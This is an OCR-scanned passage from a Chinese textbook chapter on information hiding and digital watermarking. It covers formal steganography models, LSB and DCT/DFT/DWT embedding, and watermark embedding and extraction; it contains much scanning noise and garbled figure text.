动 化 研究 所 模式 识别 国家 重点 实验 室 召 开 了 专门 的 “数字 水 印 学 术 研 讨 会 ”。 

随 着 理论 研究 的 进行 ,相关 的 应 用 技术 和 软件 也 不 断 推出 ,如 美国 Digimarc 公司 在 
1995 年 开发 了 水 印 制 作 技 术 , 是 当时 世界 上 唯一 一 家 拥有 这 一 技术 的 公司 ,并 在 Photoshop 
4.0 和 CorelDraw 7.0 中 进行 了 应 用 。 日 本 电气 公司 、 日 立 制作 所 、 先 锋 、 索 尼 和 美国 商用 
机 器 公司 在 1999 年 宣布 联合 开发 统一 标准 的 基于 数字 水 印 技术 的 DVD 光盘 防盗 版 技术 。 
DVD 光盘 在 理论 上 可 以 无 限制 地 复制 高 质量 的 画面 和 声音 ,因此 迫切 需要 有 效 的 防盗 版 技 
术 。 该 技术 的 应 用 使 消费 者 可 以 复制 高 质量 的 动态 图 像 ,但 以 赢利 为 目的 的 大 批量 非法 复 
制 则 无 法 进行 。2000 年 ,德国 在 数字 水 印 保护 和 防止 伪造 电子 照片 的 技术 方面 取得 了 突 
破 。 以 制作 个 人 身份 证 为 例 , 一 般 要 经 过 扫描 照片 和 签名 、 输 入 制 证 机 、 打 印 和 塑封 等 过 程 。 
上 述 新 技术 是 在 打印 证 件 前 ,在 照片 上 附加 一 个 暗藏 的 数字 水 印 。 具 体 做 法 是 在 照片 上 对 
某 些 不 为 人 注意 的 部 分 进行 改动 ,处 理 后 的 照片 用 肉眼 看 与 原来 几乎 一 样 ,只 有 用 专用 的 扫 
描 器 才能 发 现 水 印 , 从 而 可 以 迅速 ,无误 地 确定 证 件 的 真 伪 。 该 系统 既 可 在 照片 上 加 上 牢固 
的 水 印 ,也 可 以 经 改动 使 水 印 消失 ,使 任何 伪造 企图 都 无 法 得 件 。 由 欧盟 委员 会 资助 的 几 个 
国际 研究 项 目 也 正 致 力 于 实用 的 水 印 技术 研究 ,欧盟 期 望 能 使 其 成 员 国 在 数字 作品 电子 交 
易 方 面 达成 协议 ,其 中 的 数字 水 印 系统 可 以 提供 对 复制 品 的 探测 追踪 。 在 数字 作品 转让 之 
前 ,作品 创作 者 可 以 嵌入 创作 标志 水 印 ; 作品 转让 后 ,媒体 发 行者 对 存储 在 服务 器 中 的 作品 
加 入 发 行者 标志 ; 在 出 售 复制 作品 时 ,还 要 加 入 销售 标志 。 

经 过 多 年 的 努力 ,信息 隐藏 技术 的 研究 已 经 取得 了 许多 成 果 。 从 技术 上 来 看 ,隐藏 有 机 
密 信息 的 载体 不 但 能 经 受 人 的 感觉 检测 和 仪器 设备 的 检测 ,而 且 还 能 抵抗 各 种 人 为 的 蓄意 
攻击 。 但 总 的 来 说 ,信息 隐藏 技术 尚未 发 展 到 可 大 规模 使 用 的 阶段 , 仍 有 不 少 理论 和 技术 性 
的 问题 需要 解决 。 到 目前 为 止 ,信息 隐藏 技术 还 没有 形成 自身 的 理论 体系 。 例 如 ,如 何 计算 
一 个 数字 媒体 或 文件 所 能 隐藏 的 最 大 安全 信息 量 等 。 尽 管 信 息 隐藏 技术 在 理论 研究 、 技 术 
开发 和 实用 性 方面 尚 不 成 熟 ,但 它 的 特殊 作用 ,特别 是 在 数字 版 权 保护 方面 的 独特 作用 ,是 
任何 其 他 技术 无 法 取代 的 ,我们 有 理由 相信 信息 隐藏 技术 必 将 在 未 来 的 信息 安全 体系 中 独 
树 一 帜 。 


入 


4.2 信息 隐藏 的 概念 分 类 及 特性 


4.2.1 信息 隐藏 的 概念 


1992 年 提出 了 一 种 新 的 关于 信息 安全 的 概念 一 一 信息 隐藏 ,即将 关键 信息 秘密 地 隐藏 
于 一 般 的 载体 中 (图 像 . 声 音 、 视 频 或 一 般 的 文档 ) ,或 发 行 或 通过 网 络 传 递 ,达到 秘密 消息 保 


护 的 目的 。 由 于 非法 拦截 者 从 网 络 上 拦截 的 伪装 后 的 关键 信息 并 不 像 传统 力 
样 ,看 起 来 是 一 堆 会 激发 非法 拦截 者 破解 关键 信息 动机 的 乱码 ,而 是 看 起 来 和 
的 信息 无 异 的 明文 信息 ,因而 十 分 容易 逃 过 非法 拦截 者 的 破解 。 


密 过 的 文件 一 
其 他 非 关键 性 


信息 隐藏 不 同 于 传统 的 加 密 , 其 目的 不 在 于 限制 正常 的 资料 存 取 ,而 在 于 保证 隐藏 数据 
不 被 侵犯 和 重视 。 隐 藏 的 数据 量 与 隐藏 的 免疫 力 始 终 是 一 对 矛盾 ,目前 还 不 存在 一 种 完全 


满足 这 两 种 要 求 的 隐藏 方法 。 信 息 隐藏 技术 和 传统 的 密码 技术 的 区 别 在 于 : 
了 信息 的 内 容 , 而 信息 隐藏 不 但 隐藏 了 信息 的 内 容 , 而 且 隐藏 了 信息 的 存在 。 
提供 了 一 种 有 别 于 加 密 的 安全 模式 ,如 图 4-1 所 示 。 


11000101 #1$%8&# 人 ^ 
10100101| [办 | @&^S&&s* 
00100101 @^^&K#W%S% 
11100100 $f#**$# 
明文 密 广 
(a) 加 密 
载体 
伪装 载体 
| 隐藏 
11000101 
10100101 
00100101 
11100100 
E 


隐秘 载体 


隐藏 


#18%8 必 # 人 ^ 
@& :SR++ 
@^^&#% SN 
tt 
明文 密 广 
(c) 隐秘 
图 4-1 信息 隐藏 与 加 密 的 区 别 示 意图 


密码 仅仅 隐藏 
信息 隐藏 技术 
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信息 隐藏 是 集 多 门 学 科 理 论 技 术 于 一 身 的 新 兴 技 术 领 域 , 它 利 用 人 类 感觉 器 官 对 数字 
信号 的 感觉 元 余 , 将 一 个 消息 隐藏 在 另 一 个 消息 中 。 由 于 隐藏 后 外 部 表现 的 只 是 遮掩 消息 
的 外 部 特征 , 故 并 不 改变 遮掩 消息 的 基本 特征 和 使 用 价值 。 

数字 信息 隐藏 技术 已 成 为 信息 科学 领域 研究 的 一 个 热点 。 被 隐藏 的 秘密 信息 可 以 是 文 
字 、 密 码 图像. 图 形 或 声音 ,而 作为 宿主 的 公开 信息 可 以 是 一 般 的 文本 文件 .数字 图 像 ,数字 
视频 和 数字 音频 等 。 

通常 把 被 隐藏 的 信息 称 为 秘密 信息 (secret message) ,如 版 权 信息 、 秘 密 数据 .软件 序列 
号 等 。 而 公开 信息 则 称 为 载体 信息 (cover message) ,如 视频 图片. 音 频 等 。 这 种 信息 隐藏 
过 程 一 般 由 密 钥 (key) 来 控制 ,通过 艇 和 人 算法 (embedding algorithm) 将 秘密 信息 隐藏 于 公开 
信息 中 ,而 隐秘 载体 (隐藏 有 秘密 信息 的 公开 信息 ) 则 通过 通信 信道 (communication 
channel) 传 递 , 然 后 对 方 的 检测 器 (detector) 利 用 密 钥 从 隐蔽 载体 中 恢复 /检测 出 秘密 信息 。 
信息 隐藏 的 一 般 模 型 如 图 4-2 所 示 。 


密 钥 密 钥 


秘密 信息 隐秘 载体 


信息 说 入 算法 人- 通 入 信 道 一 小。 检测 器 。 上- 到 宇 信息。 


图 4-2 信息 隐藏 的 一 般 模型 


信息 隐藏 技术 主要 由 下 述 两 部 分 组 成 。 

(1) 信息 嵌入 算法 (编码 器 ) , 它 利用 密 钥 来 实现 秘密 信息 的 隐藏 。 

(2) 信息 提取 算法 (检测 器 ) , 它 利 用 密 钥 从 隐秘 载体 中 检测 并 恢复 出 秘密 信息 。 在 密 
钥 未 知 的 前 提 下 ,第 三 者 很 难 从 隐秘 载体 中 得 到 或 删除 甚至 发 现 秘密 信息 。 


4.2.2 信息 隐藏 的 分 类 


信息 隐藏 是 一 门 新 兴 的 交叉 学 科 , 包 含 的 内 容 十 分 广泛 ,在 计算 机 、 通 信 、 保 密 学 等 领域 
有 着 广阔 的 应 用 背景 。1999 年 ,法 比 安 (Fabien) 对 信息 隐藏 作 了 分 类 ,如 图 4-3 所 示 。 


载体 信息 


党 息 隐藏 
隐 通 首 隐 写 术 匿名 通信 ”| 版 权 标识 
语言 学 中 的 隐 写 术 | 。 | 技术 上 的 隐 写 术 稳健 的 版 权 标识 | 。 | 用 弱 的 版 权 标识 
数字 水 印 数字 指纹 
可 见 数字 水 印 不 可 见 数字 水 印 


图 4-3 信息 隐藏 的 分 类 
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按照 Fabien 的 分 类 ,信息 隐藏 被 分 为 四 大 分 支 。 在 这 些 分 支 中 , 隐 写 术 和 版 权 标识 是 
目前 研究 比较 广泛 和 热门 的 课题 。 

根据 密 钥 的 不 同 ,信息 隐藏 可 以 分 为 三 类 : 无 密 钥 的 信息 隐藏 、. 私 钥 信 息 隐 藏 和 公 钥 信 
息 隐 藏 。 

1. 无 密 钥 的 信息 隐藏 

无 密 钥 信息 嵌入 的 过 程 为 

映射 E:CXM 一 C 

其 中 ,C 为 所 有 可 能 载体 的 集合 ; M 为 所 有 可 能 秘密 消息 的 集合 ; C* 为 所 有 伪装 对 象 的 
集合 。 

提取 过 程 为 

映射 D:C* 一 M 
双方 约定 嵌入 算法 E 和 提取 算法 D ,算法 要 求 保密 。 
定义 4-1 对 一 个 五 元 组 
5= {C,M,C,D,E} 

其 中 ,C 是 所 有 可 能 载体 的 集合 ; M 是 所 有 可 能 秘密 消息 的 集合 ; C* 是 所 有 可 能 伪装 对 象 
的 集合 ; 已 是 嵌入 函数 ; D 是 提取 函数 。 

车 满足 性 质 * 对 所 有 mEM 和 cEC, 恒 有 D(C(E(e,m))= 二 ma”, 则 称 该 五 元 组 为 无 密 钥 信 
息 隐藏 系统 。 不 同 的 髋 入 算法 对 载体 的 影响 不 同 。 选 择 最 合适 的 载体 ,使 得 信息 嵌入 后 影 
响 最 小 , 即 载体 对 象 与 伪装 对 象 的 相似 度 最 大 。 

对 于 无 密 钥 的 信息 隐藏 ,系统 的 安全 性 完全 依赖 于 隐藏 算 法 和 提取 算法 的 保密 性 ,如 果 
算法 被 泄露 出 去 , 则 信息 隐藏 无 任何 安全 可 言 。 

2. 私 钥 信 息 隐藏 

定义 4-2 ”对 一 个 六 元 组 


5= {C,M,K,C,D,E} 

其 中 ,C 是 所 有 可 能 载体 的 集合 ; M 是 所 有 可 能 秘密 消息 的 集合 ; K 是 所 有 可 能 密 钥 的 集 
合 ; C'" 是 所 有 可 能 伪装 对 象 的 集合 ; E 是 幅 入 函数 ,CXMXK= 二 C'; D 是 提取 函数 ,Cx 
下 一 M。 

若 满 足 性 质 * 对 所 有 mEM,cEC 和 kEK, 恒 有 Dk (Ek (csmsk),k) 二 m”, 则 称 该 六 元 
组 为 私 钥 信 息 隐藏 系统 。 

私 钥 信 息 隐 藏 系统 需要 密 钥 的 交换 。 假 定 通信 双方 都 能 够 通过 一 个 安全 的 信道 来 协商 
密 钥 ,并 且 有 各 种 密 钥 交换 协议 ,以 保证 通信 双方 拥有 一 个 相同 的 伪装 密 钥 &。 

3. 公 钥 信息 隐藏 

公 钥 信息 隐藏 类 似 于 公 钥 密码 。 通 信 各 方 使 用 约定 的 公 钥 体制 ,各 自 产生 自己 的 公开 
密 钥 和 私有 密 钥 ,将 公开 密 钥 存储 在 一 个 公开 的 数据 库 中 ,通信 各 方 可 以 随时 取 用 ,私有 密 
钥 由 通信 各 方 自己 保存 ,不 予 公开 。 

公开 密 钥 用 于 信息 的 嵌入 过 程 ,私有 密 钥 用 于 信息 的 提取 过 程 。 一 个 公 钥 信息 隐藏 系 
统 的 安全 性 完全 取决 于 所 选用 的 公 钥 密码 体制 的 安全 性 。 
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4.2.3 信息 隐藏 的 特性 


与 传统 的 加 密 方 式 不 同 的 是 ,信息 隐藏 的 目的 在 于 保证 隐藏 数据 不 被 未 授权 的 第 三 方 
探知 和 侵犯 ,保证 隐藏 的 信息 在 经 历 各 种 环境 变故 和 操作 之 后 不 受 破坏 。 因 此 ,信息 隐藏 技 
术 必 须 考虑 正常 的 信息 操作 造成 的 威胁 ,使 秘密 信息 对 正常 的 数据 操作 ,如 通常 的 信号 变换 
或 数据 压缩 等 操作 具有 免疫 能 力 。 根 据 信 息 隐 藏 的 目的 和 技术 要 求 , 它 存在 以 下 5 个 特性 。 

(1) 安全 性 (security) 。 衡 量 一 个 信息 隐藏 系统 的 安全 性 ,要 从 系统 自身 算法 的 安全 性 
和 可 能 受到 的 攻击 两 方面 来 进行 分 析 。 攻 破 一 个 信息 隐藏 系统 可 分 为 3 个 层次 : 证 明 隐 藏 
信息 的 存在 .提取 隐藏 信息 和 破坏 隐藏 信息 。 如 果 一 个 攻击 者 能 够 证 明 一 个 隐藏 信息 的 存 
在 ,那么 这 个 系统 就 已 经 不 安全 了 。 安 全 性 是 指 信息 隐藏 算法 有 较 强 的 抗 攻击 能 力 , 它 能 够 
承受 一 定 的 人 为 的 攻击 而 使 隐藏 信息 不 会 被 破坏 。 

(2) 和 鲁 棒 性 (robustness)。 除 了 主动 攻击 者 对 伪装 对 象 的 破坏 以 外 ,伪装 对 象 在 传递 过 
程 中 也 可 能 受到 非 恶意 的 修改 ,如 图 像 传 输 时 ,为 了 适应 信息 的 带宽 ,需要 对 图 像 进行 压缩 
编码 ,还 可 能 会 对 图 像 进 行 平滑 滤波 和 变换 处 理 , 声 音 的 滤波 、 多 媒体 信号 的 格式 转换 等 ， 
这 些 正 常 的 处 理 都 有 可 能 导致 隐藏 信息 的 丢失 。 信 息 隐藏 系统 的 鲁 棒 性 是 指 抗拒 因 伪装 对 
象 的 某 种 改动 而 导致 隐藏 信息 丢失 的 能 力 。 所 谓 改动 ,包括 传输 过 程 中 的 信道 噪声 ,滤波 操 
作 、 重 采样 \ 有 损 编 码 压 缩 .D/A 或 A/D 转换 等 。 

(3) 不 可 检测 性 Cundetectability) 。 不 可 检测 性 是 指 隐 项 载体 与 原始 载体 具有 一 致 的 
特性 ,如 具有 一 致 的 统计 噪声 分 布 , 以 便 使 非法 拦截 者 无 法 判断 是 否 藏 有 隐秘 信息 。 

(4) 透明 性 (invisibility)。 透 明 性 是 指 利 用 人 类 视觉 系统 或 听 党 系统 属性 ,经 过 一 系列 
隐藏 处 理 , 目 标 数据 必须 没有 明显 的 降 质 现象 ,而 隐藏 的 数据 无 法 被 看 见 或 听见 。 

(5) 自 恢 复 性 (self-recovery)。 经 过 一 些 操 作 或 变换 后 ,可 能 使 原 图 产生 较 大 的 破坏 ， 
如 果 只 从 留 下 的 片段 数据 仍 能 恢复 隐藏 信号 ,而 且 恢 复 过 程 不 需要 宿主 信号 ,这 就 是 所 谓 的 


4.3 信息 隐藏 的 算法 


根据 载体 的 不 同 , 信 息 隐 藏 可 以 分 为 图 像 、 视 频 、 音 频 、 文 本 和 其 他 各 类 数据 的 信息 隐 
藏 。 在 不 同 的 载体 中 ,信息 隐藏 的 方法 有 所 不 同 ,需要 根据 载体 的 特征 选择 合适 的 隐藏 算 
法 。 例 如 ,图 像 、 视 频 和 音频 中 的 信息 隐藏 利用 了 人 的 感官 对 于 这 些 载 体 的 元 余 度 来 隐藏 信 
息 ; 而 文本 或 其 他 各 类 数据 需要 从 另外 一 些 角度 来 设计 隐藏 方案 。 因 此 ,一 种 很 自然 的 想 
法 是 用 秘密 信息 替代 伪装 载体 中 的 宛 余部 分 , 蔡 换 技术 是 最 直观 的 一 种 隐藏 算法 ,也 称 为 空 
间 域 算法 。 除 此 之 外 ,对 图 像 进行 变换 也 是 信息 隐藏 常用 的 一 种 手段 , 称 为 变换 域 算法 。 下 
面 通过 例子 来 说 明 图 像 中 可 以 用 来 隐藏 信息 的 地 方 。 

1. 图 像 的 基本 表示 

一 幅 图 像 是 由 很 多 个 像素 (pixel) 点 组 成 的 ,像素 是 构成 图 像 的 基本 元 素 。 例 如 ,一 幅 
图 像 的 大 小 是 640X480, 则 说 明 这 个 图 像 在 水 平方 向 上 有 640 个 像素 点 ,在 垂直 方向 上 有 
480 个 像素 点 。 图 像 可 分 为 灰 度 图 像 和 彩色 图 像 。 数 字 图 像 一 般 用 矩阵 来 表示 ,图 像 的 空 


第 4 章 信息 隐藏 技术 81 


间 坐 标 XY 被 量化 为 m Xn 个 像素 点 ,如 果 每 个 像素 点 仅 由 灰 度 值 表示 , 则 这 种 图 像 称 为 
灰 度 图 像 ; 如 果 每 个 像素 点 由 红 、 绿 、 蓝 三 基色 组 成 , 则 这 种 图 像 称 为 彩色 图 像 。 在 彩色 图 
像 中 ,任何 颜色 都 可 以 由 这 3 种 基本 颜色 以 不 同 的 比例 调和 而 成 。 灰 度 图 像 的 灰 度 值 构成 
灰 度 图 像 的 矩阵 表示 ; 彩色 图 像 可 以 用 类 似 于 灰 度 图 像 的 矩阵 表示 ,只 是 在 彩色 图 像 中 ， 
3 个 矩阵 组 成 ,每 一 个 矩阵 代表 三 基色 之 一 。 

对 于 一 幅 灰 度 图 像 来 说 ,如 果 每 个 像素 点 的 灰 度 值 仅 取 0 或 1, 则 这 种 图 像 称 为 二 值 图 
像 ; it 一 255, 每 个 像素 点 可 用 8 位 来 表示 , 则 记 为 (ar ,a6,… ,ao)， 
其 中 a 二 0 或 1(i 二 0,1,…,7)。 对 于 每 个 像素 点 来 说 ,都 取 其 中 的 某 一 位 就 构成 了 一 幅 二 
值 图 像 。 ep ao 位 , 则 这 种 图 像 称 为 该 图 像 的 第 0 位 位 平面 ( 即 最 低位 位 
平面 ) 图 像 , 以 此 类 推 ,共有 8 个 位 平面 图 像 。 各 个 位 平面 图 像 的 效果 如 图 4-4 所 示 。 图 中 
第 1 张 是 8 位 灰 度 图 像 ,后 面 依次 是 从 高 位 到 低位 的 位 平面 图 像 。 从 这 几 幅 位 平面 图 像 中 
可 以 看 出 , 较 高 位 的 位 平面 图 像 反映 了 原始 图 像 的 轮廓 信息 ,而 较 低位 的 位 平面 图 像 看 上 去 
几乎 与 原始 图 像 无 关 。 如 果 将 原始 图 像 的 每 个 像素 点 的 最 低位 一 律 变 成 0, 则 图 像 效 果 如 
图 4-5 所 示 ,显而易见 ,这 两 幅 图 像 的 差别 是 非常 小 的 ,人 眼 视 觉 很 难 感知 。 


区 肆 


原始 图 像 位 平面 7 位 平面 6 


位 平面 5 位 平面 4 


位 平面 1 位 平面 0 
4-4 8 位 灰 度 图 像 的 8 个 位 平面 


原始 图 像 最 低位 为 0 


4-5 ”原始 图 像 与 最 低位 为 0 的 图 像 
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上 述 两 个 例子 说 明 ,如 果 将 像素 点 最 低位 蔡 换 成 秘密 信息 ,人 眼 是 难以 察觉 的 ,从 而 可 
以 达到 信息 隐藏 的 目的 。 

2. 空间 域 算 法 

基于 图 像 低位 字 节 对 图 像 影 响 较 小 的 原理 ,下 面 给 出 一 个 24 位 彩色 图 像 的 信息 隐藏 算 
法 ,算法 示意 图 如 图 4-6 所 示 。 


签名 信息 | S7 | S6 | S5 | S4 | S3 | S2 | S1 | S0 


加 | 


位 图 信息 流 | X7 | x6 | x5 | x4 | x3 | x2 | x1 | x0 X7 | X6 | X5 | x4 | x3 | x2 | x1 | xo 


图 4-6 字 节 替换 方法 示意 图 


算法 过 程 描述 如 下 。 

(1) 将 待 隐藏 信息 ( 称 为 签名 信息 ) 的 字 节 长 度 写 入 BMP 文件 标 头 部 分 的 保留 字 节 中 。 

(2) 将 签名 信息 转化 为 二 进 制 数据 码 流 。 

(3) 将 BMP 文件 图 像 数 据 部 分 的 每 个 字 节 的 最 低位 依次 车 换 为 上 述 二 进 制 数码 流 的 
= 个 

依照 上 述 算法 ,一 个 24 位 的 彩色 图 像 经 空间 域 变换 后 的 图 像 如 图 4-7 所 示 。 


(a) 未 眶 入 信息 (b) 嵌入 信息 后 (c) 被 隐藏 的 信息 
图 4-7 一 个 24 位 图 像 变换 前 后 的 对 比 图 


由 于 原始 24 位 BMP 图 像 文件 隐藏 信息 后 ,其 数据 部 分 每 字 节 数值 最 多 变化 1 位 ,该 字 
节 代 表 的 像素 最 多 只 变化 了 1/256 ,因此 已 隐藏 信息 的 BMP 图 像 与 未 隐藏 信息 的 BMP 图 
像 用 肉眼 是 看 不 出 差别 的 。 

如 果 将 BMP 文件 图 像 数 据 部 分 的 每 个 字 节 最 低 4 位 依次 替换 为 签名 信息 二 进 制 数码 
流 的 4 位 , 则 由 于 原始 24 位 BMP 图 像 文件 隐藏 信息 后 ,其 数据 部 分 字 节 数值 最 多 变化 为 
16 ,该 字 节 代 表 的 像素 最 多 变化 了 1/16 ,因此 已 隐藏 信息 的 BMP 图 像 与 未 隐藏 信息 的 
BMP 图 像 ( 图 4-8) 用 肉眼 能 看 出 差别 。 

3. 变换 ( 频 ) 域 算法 

空间 域 算 法 的 最 大 缺点 是 鲁 棒 性 差 , 很 难 抵抗 包括 有 损 压 缩 、 低 通 滤波 等 在 内 的 各 种 攻 
击 。 另 外 ,空间 域 中 信息 隐藏 算法 只 能 嵌入 很 小 的 数据 量 。 图 像 的 频 域 算法 是 指 对 图 像 数 
据 进行 某 种 变换 ,这 种 方法 可 以 嵌入 大 量 的 比特 而 不 引起 可 察觉 的 降 质 ,当选 择 改变 中 频 或 
低频 分 量 (DCT 变换 除去 直流 分 量 ) 来 嵌入 信息 时 ,健壮 性 可 以 大 大 提高 。 常 用 的 频 域 信息 
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(a) 未 嵌入 信息 (b) 嵌入 信息 后 (c) 被 隐藏 的 信息 
图 4-8 最 低 4 位 替换 隐藏 图 像 对 比 图 


隐藏 算法 有 DFT( 离 散 傅 里 叶 变 换 )、DCT( 离 散 余弦 变换 ) 和 DWT( 离 散 小 波 变 换 ) 。 

Hartunt 等 人 提出 了 一 种 DCT 域 信息 隐藏 算法 ,其 方法 是 首先 把 图 像 分 成 8X8 的 不 
重 价 像素 块 ,经 过 分 块 DCT 得 到 由 DCT 系数 组 成 的 频率 块 ,然后 随机 选取 一 些 频率 块 ,将 
秘密 信息 嵌入 到 由 密 钥 控制 选择 的 一 些 DCT 系数 中 。 该 算法 是 通过 对 选 定 的 DCT 系数 
进行 微小 变换 以 满足 特定 的 关系 来 表示 一 个 比特 的 信息 的 。 在 提取 秘密 信息 时 ,可 选取 相 
同 的 DCT 系数 ,并 根据 系数 之 间 的 关系 抽取 比特 信息 。 其 思想 类 似 于 扩展 频谱 通信 中 的 
跳 频 (frequency hopping) 技 术 ,特点 是 数据 改变 幅度 较 小 , 且 透 明 性 好 ,但 是 其 抵抗 几何 变 
换 等 攻击 的 能 力 较 弱 。 基 于 DFT 和 DWT 的 算法 与 上 述 算法 具有 相似 的 原理 。 

这 种 以 变换 域 算法 为 代表 的 通用 算法 普遍 采用 变换 技术 ,以 便 在 频率 域 实现 秘密 信息 
全 加 ,并 借鉴 扩展 频谱 通信 等 技术 对 秘密 信息 进行 有 效 的 编码 ,从 而 提高 了 透明 性 和 重 棱 
性 ,同时 还 适当 利用 滤波 技术 对 秘密 信息 引入 的 高 频 噪声 进行 了 消除 ,从 而 增加 了 对 低频 滤 
波 攻 击 的 抵抗 力 。 该 方法 同样 适用 于 数字 水 印 的 嵌入 。 

如 图 4-9 所 示 ,以 一 幅 图 像 为 例 , 分 别 给 出 用 DFT 域 .DCT 域 和 DWT 域 算法 内 入 信息 
后 生成 的 图 像 ,的 确 , 通 过 肉眼 很 难 区 分 是 否 戏 入 了 秘密 信息 ,必须 通过 计算 机 分 析 才 能 
判断 。 


(a) 原始 图 像 (b) DFT 域 (c) DCT 域 (d) DWT 域 


图 4-9 原始 图 像 与 经 过 DFT 域 `.DCT 域 和 DWT 域 算法 嵌入 信息 后 生成 的 图 像 


4.4 数字 水 印 


多 媒体 通信 业务 和 互联 网 的 快速 发 展 给 信息 的 广泛 传播 提供 了 前 所 未 有 的 便利 ,各 种 
形式 的 多 媒体 作品 (包括 视频 音频 和 图 像 等 ) 纷 纷 以 网 络 形式 发 布 。 然 而 ,任何 人 都 可 以 通 
过 网 络 轻而易举 地 获得 他 人 的 原始 作品 ,甚至 不 经 作者 的 同意 任意 复制 、 修 改 ,这 些 现象 严 
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重 侵害 了 作者 的 知识 产权 。 为 了 防止 这 种 情况 的 发 生 , 保 护 作 者 的 版 权 , 人 们 提出 了 数字 水 
印 的 概念 。 

数字 水 印 类 似 于 信息 隐藏 , 它 也 是 在 数字 化 的 信息 载体 ( 指 多 媒体 作品 ) 中 嵌入 不 明显 
的 记号 (也 称 为 标识 或 水 印 ) 隐 藏 起 来 ,被 嵌入 的 信息 包括 作品 的 版 权 所 有 者 、 发 行者 .购买 
者 ,作者 的 序列 号 .日 期 和 有 特殊 意义 的 文本 等 ,但 目的 不 是 为 了 隐藏 或 传递 这 些 信息 ,而 是 
在 发 现 盗版 或 发 生 知识 产权 纠纷 时 ,用 来 证 明 数 字 作 品 的 来 源 ,版 本 、 原 作者 、 拥 有 者 发 行 
人 及 合法 使 用 人 等 。 通 常 被 嵌入 的 标识 是 不 可 见 或 不 可 观察 的 , 它 与 源 数据 紧密 结合 并 隐 
藏 其 中 ,成 为 源 数据 不 可 分 离 的 一 部 分 ,并 可 以 经 历 一 些 不 破坏 源 数据 的 使 用 价值 的 操作 而 
存活 下 来 。 这 样 的 标识 可 以 通过 计算 机 操作 被 检测 或 者 被 提取 出 来 。 显 而 易 见 ,数字 水 印 
是 数字 化 的 多 媒体 作品 版 权 保护 的 关键 技术 之 一 ,也 是 信息 隐藏 的 重要 分 支 。 

1. 数字 水 印 的 基本 原理 

人 们 利用 视觉 和 听觉 的 宛 余 特性 ,在 多 媒体 作品 中 添加 标识 后 并 不 影响 作品 的 视听 效 
果 , 并 且 还 能 通过 计算 机 操作 部 分 或 全 部 恢复 隐藏 信息 , 即 水 印信 息 。 从 版 权 保护 的 角度 来 
看 ,无 论 攻击 者 如 何 对 源 数据 实施 何 种 破坏 行为 ,水 印信 息 都 是 无 法 被 去 掉 的 。 与 加 密 技术 
不 同 , 数 字 水 印 技术 不 能 阻止 盗版 行为 。 

通用 的 数字 水 印 算法 一 般 包含 水 印 生成 算法 ,水 印 嵌 入 和 提取 /检测 3 个 方面 。 其 中 ， 
水 印 生成 算法 主要 涉及 怎样 构造 具有 良好 随机 特性 的 水 印 , 并 且 出 于 水 印 安 全 性 考虑 ,有 的 
算法 在 水 印 嵌 入 之 前 采用 其 他 相关 技术 先 对 水 印 进行 嵌入 预 处 理 , 如 扩 频 、 纠 错 编码 或 加 密 
等 。 以 下 仅 就 水 印 的 嵌入 和 提取 /检测 两 个 方面 进行 介绍 。 水 印 嵌 入 模型 框架 如 图 4-10 
所 示 。 


没有 水 印 的 
输入 数据 C 
| [数字 水 印 |_ ,| 有 水 印 的 输 
Ey 说 入 算法 [| 出 数据 Cw 
数字 水 印 所 { 


用 户 密 钥 K 


图 4-10 水 印 嵌 入 模型 


在 数字 水 印 的 嵌入 过 程 中 ,可 先 对 被 保护 的 数字 产品 C 和 数字 水 印 W 进行 预 处 理 。 此 
预 处 理 可 以 是 任何 一 种 变换 操作 (如 DCT DFT、 小 波 变换 、 传 里 叶 -梅林 变换 等 ) 或 一 些 变 
换 操 作 的 组 合 ,也 可 以 为 空 操作 (这 时 嵌入 水 印 为 空间 域 水 印 ) 等 。 用 户 密 钥 及 表示 数字 水 
印 嵌 人 算法 的 密 钥 ,Cw 是 嵌入 水 印 后 输出 的 数字 产品 。 

水 印 提取 模型 框架 如 图 4-11 所 示 。 


有 水 印 的 输 
入 数据 Cr 
| | 数字 水 印 提取 出 的 
提取 算法 水 印 W' 
用 户 密 钥 K 


图 4-11 水 印 提 取 模 型 
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数字 水 印 提取 过 程 的 输出 有 两 种 可 能 : 一 种 是 直接 提取 水 印 , 得 到 提取 出 的 水 印 W'; 
另 一 种 是 得 到 水 印 是 否 存在 的 结论 。 

水 印 提取 过 程 中 ,原始 数字 载体 是 可 选择 的 , 它 取 决 于 具体 嵌入 算法 ,有 些 算 法 需要 原 
始 载体 ,有 些 则 不 需要 。 

利用 上 述 数字 水 印 模型 ,可 以 分 析 目 前 提出 的 各 种 数字 水 印 方 案 。 大 部 分 数字 水 印 算 
法 都 是 在 预 处 理 和 嵌入 算法 上 做 文章 。 根 据 预 处 理 的 不 同 ,可 以 把 各 种 水 印 方案 分 类 ,如 空 
间 域 水 印 ( 预 处 理 为 空 操作 ) ,变换 域 水 印 ( 预 处 理 为 各 种 变换 )。 变 换 域 水 印 中 又 根据 变换 
域 的 不 同 ,分 为 DCT 域 水 印 、 小 波 变 换 域 水 印 等 。 除 了 预 处 理 的 不 同 ,还 有 肉 入 算法 的 不 
同 , 它 们 的 一 些 组 合 就 构成 了 多 种 多 样 的 数字 水 印 算法 。 

2. 数字 水 印 算 法 

数字 水 印 技术 涉及 许多 研究 领域 ,包括 图 像 处 理 、 数 字 通 信 、 密 码 学 和 信号 检测 与 估计 
等 。 以 数字 图 像 产品 为 例 ,根据 水 印 戏 入 图 像 的 方式 不 同 , 目 前 的 水 印 技术 大 致 可 分 为 空间 
域 技术 和 变换 域 技术 ,对 于 其 他 数字 产品 ,例如 ,音频 和 视频 产品 所 使 用 的 算法 也 基本 类 似 。 

(1) 空间 域 技术 。 空 间 域 技术 是 最 早 的 也 是 最 简单 的 水 印 算法 ,其 原理 就 是 通过 改变 
图 像 中 某 些 像素 值 来 加 入 信息 ,再 通过 记录 提取 这 些 信息 来 检测 水 印 。 该 类 算法 中 典型 的 
是 最 低 有 效 位 算法 (LSB 法 ) 。 该 方法 可 保证 嵌入 的 水 印 不 可 见 , 但 是 由 于 使 用 了 不 重要 的 
图 像 像素 位 ,算法 的 鲁 棒 性 差 ,水印 信息 很 容易 因 滤波 、 图 像 量 化 、 几 何 变形 的 操作 而 被 破 
坏 。 另 外 一 个 常用 的 方法 是 利用 像素 的 统计 特征 将 信息 嵌入 像素 的 亮度 值 中 。Patchwork 
方法 是 随机 选取 N 对 像素 点 ,然后 通过 增加 像素 对 中 一 个 点 的 亮度 值 , 而 相应 降低 另 一 个 
点 的 亮度 值 的 调整 来 隐藏 信息 ,这 样 整个 图 像 的 平均 亮度 保持 不 变 。 适 当地 调整 参数 ， 
